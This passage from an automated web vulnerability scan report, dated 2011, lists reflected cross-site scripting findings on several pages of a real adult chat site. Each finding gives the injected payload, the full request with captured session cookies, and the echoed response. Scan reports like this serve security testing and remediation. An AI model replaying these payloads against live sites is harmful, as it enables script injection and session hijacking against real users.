Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:21:28 GMT
Connection: close
Content-Length: 195962
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/gay/?d4cfa'-alert(1)-'0c9972c192e=1&qs=cat=1^roomid=53^d4cfa'-alert(1)-'0c9972c192e=1&qs=cat=1^roomid=53^d4cfa'-alert(1)-'0c9972c192e=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eb
...[SNIP]...

2.91. http://imlive.com/live-sex-chats/guy-alone/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/guy-alone/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5b427'-alert(1)-'a0cb4a3aa6b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/guy-alone/?5b427'-alert(1)-'a0cb4a3aa6b=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:19:39 GMT
Connection: close
Content-Length: 70611
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/guy-alone/?5b427'-alert(1)-'a0cb4a3aa6b=1&qs=cat=1^roomid=54^5b427'-alert(1)-'a0cb4a3aa6b=1&qs=cat=1^roomid=54^5b427'-alert(1)-'a0cb4a3aa6b=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eb
...[SNIP]...

2.92. http://imlive.com/live-sex-chats/guy-alone/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /live-sex-chats/guy-alone/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88b77"><a>0945077855 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/guy-alone/?88b77"><a>0945077855=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:19:25 GMT
Connection: close
Content-Length: 70405
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a href="/live-sex-chats/guy-alone/?88b77"><a>0945077855=1">
...[SNIP]...

2.93. http://imlive.com/live-sex-chats/happyhour/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/happyhour/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 95f8e'-alert(1)-'12b8116e5e2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/happyhour/?95f8e'-alert(1)-'12b8116e5e2=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:38 GMT
Connection: close
Content-Length: 22962
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/happyhour.aspx&he=imlive.com&ul=/live-sex-chats/happyhour/?95f8e'-alert(1)-'12b8116e5e2=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined'
...[SNIP]...

2.94. http://imlive.com/live-sex-chats/happyhour/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /live-sex-chats/happyhour/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82f3c"><a>aec254de933 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/happyhour/?82f3c"><a>aec254de933=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:15 GMT
Connection: close
Content-Length: 22814
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/live-sex-chats/happyhour/?82f3c"><a>aec254de933=1');return false;" lang="en-US" hreflang="en-US">
...[SNIP]...

2.95. http://imlive.com/live-sex-chats/lesbian-couple/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/lesbian-couple/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c06bb'-alert(1)-'229e135fe5b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/lesbian-couple/?c06bb'-alert(1)-'229e135fe5b=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:21:07 GMT
Connection: close
Content-Length: 119630
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/lesbian-couple/?c06bb'-alert(1)-'229e135fe5b=1&qs=cat=1^roomid=191^c06bb'-alert(1)-'229e135fe5b=1&qs=cat=1^roomid=191^c06bb'-alert(1)-'229e135fe5b=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63
...[SNIP]...

2.96. http://imlive.com/live-sex-chats/lesbian-couple/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /live-sex-chats/lesbian-couple/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95de2"><a>dfcf1a79259 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/lesbian-couple/?95de2"><a>dfcf1a79259=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:20:50 GMT
Connection: close
Content-Length: 119446
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a href="/live-sex-chats/lesbian-couple/?95de2"><a>dfcf1a79259=1">
...[SNIP]...

2.97. http://imlive.com/live-sex-chats/lesbian/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/lesbian/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 799a4'-alert(1)-'5a8a05031a3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/lesbian/?799a4'-alert(1)-'5a8a05031a3=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:19:42 GMT
Connection: close
Content-Length: 33699
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/lesbian/?799a4'-alert(1)-'5a8a05031a3=1&qs=cat=1^roomid=11^799a4'-alert(1)-'5a8a05031a3=1&qs=cat=1^roomid=11^799a4'-alert(1)-'5a8a05031a3=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eb
...[SNIP]...

2.98. http://imlive.com/live-sex-chats/lesbian/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /live-sex-chats/lesbian/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af6d9"><a>bfa76ccfa1f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/lesbian/?af6d9"><a>bfa76ccfa1f=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:19:33 GMT
Connection: close
Content-Length: 33515
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a href="/live-sex-chats/lesbian/?af6d9"><a>bfa76ccfa1f=1">
...[SNIP]...

